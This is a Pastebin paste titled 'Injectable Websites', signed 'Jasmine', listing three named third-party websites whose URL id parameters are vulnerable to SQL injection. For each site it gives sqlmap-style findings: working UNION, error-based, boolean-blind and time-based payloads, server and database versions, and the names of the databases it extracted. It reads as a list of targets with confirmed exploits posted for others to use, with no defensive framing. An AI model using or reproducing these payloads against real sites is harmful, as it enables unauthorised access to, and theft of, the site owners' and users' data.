Advertisement
Lifted

Injectable Websites

Dec 21st, 2014
244
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.98 KB | None | 0 0
  1. /\ /\
  2. { `---' }
  3. { O O }
  4. ~~> V <~~
  5. \ \|/ /
  6. `-----'____
  7. / \ \_
  8. { }\ )_\_ _
  9. | \_/ |/ / \_\_/ )
  10. \__/ /(_/ \__/
  11. (__/
  12. Jasmine
  13. ---------------------------
  14. www.romanianwriters.ro/s.php?id=1
  15. Type: UNION query
  16. Title: MySQL UNION query (NULL) - 3 columns
  17. Payload: id=-2956' UNION ALL SELECT NULL,CONCAT(0x7162756c71,0x6e68677565707147476c,0x71777a6b71),NULL#
  18.  
  19. Type: AND/OR time-based blind
  20. Title: MySQL > 5.0.11 AND time-based blind
  21. Payload: id=1' AND SLEEP(5) AND 'NQmL'='NQmL
  22. ---
  23. [22:50:45] [INFO] the back-end DBMS is MySQL
  24. web server operating system: Linux Ubuntu 10.10 (Maverick Meerkat)
  25. web application technology: PHP 5.3.3, Apache 2.2.16
  26. back-end DBMS: MySQL 5.0
  27. [22:50:45] [INFO] fetching database names
  28. [22:50:46] [INFO] the SQL query used returns 2 entries
  29. [22:50:46] [INFO] resumed: "information_schema"
  30. [22:50:46] [INFO] resumed: "romanian_svc"
  31. available databases [2]:
  32. [*] information_schema
  33. [*] romanian_svc
  34. -------------------------------------------------
  35. www.cobranet.org/about.php?id=1
  36.  
  37. Type: boolean-based blind
  38. Title: AND boolean-based blind - WHERE or HAVING clause
  39. Payload: id=1 AND 1482=1482
  40.  
  41. Type: error-based
  42. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  43. Payload: id=1 AND (SELECT 7721 FROM(SELECT COUNT(*),CONCAT(0x7177727971,(SELECT (CASE WHEN (7721=7721) THEN 1 ELSE 0 END)),0x7161796a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  44.  
  45. Type: UNION query
  46. Title: MySQL UNION query (NULL) - 6 columns
  47. Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x7177727971,0x675770546c53796a7866,0x7161796a71),NULL,NULL,NULL,NULL#
  48.  
  49. Type: AND/OR time-based blind
  50. Title: MySQL > 5.0.11 AND time-based blind
  51. Payload: id=1 AND SLEEP(5)
  52. ---
  53. [22:57:48] [INFO] the back-end DBMS is MySQL
  54. web server operating system: Linux CentOS 5.8
  55. web application technology: Apache 2.2.3, PHP 5.1.6
  56. back-end DBMS: MySQL 5.0
  57. [22:57:48] [INFO] fetching database names
  58. available databases [3]:
  59. [*] cobranetdb
  60. [*] information_schema
  61. [*] test
  62. ---------------------------------------
  63. cathedralhillpress.com/book.php?id=1
  64. Type: error-based
  65. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  66. Payload: id=1 AND (SELECT 8072 FROM(SELECT COUNT(*),CONCAT(0x7171636171,(SELECT (CASE WHEN (8072=8072) THEN 1 ELSE 0 END)),0x716e667971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  67.  
  68. Type: AND/OR time-based blind
  69. Title: MySQL > 5.0.11 AND time-based blind
  70. Payload: id=1 AND SLEEP(5)
  71. ---
  72. [23:03:16] [INFO] the back-end DBMS is MySQL
  73. web application technology: Apache
  74. back-end DBMS: MySQL 5.0
  75. [23:03:16] [INFO] fetching database names
  76. [23:03:17] [INFO] the SQL query used returns 2 entries
  77. [23:03:17] [INFO] retrieved: information_schema
  78. [23:03:17] [INFO] retrieved: chp_books
  79. available databases [2]:
  80. [*] chp_books
  81. [*] information_schema
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement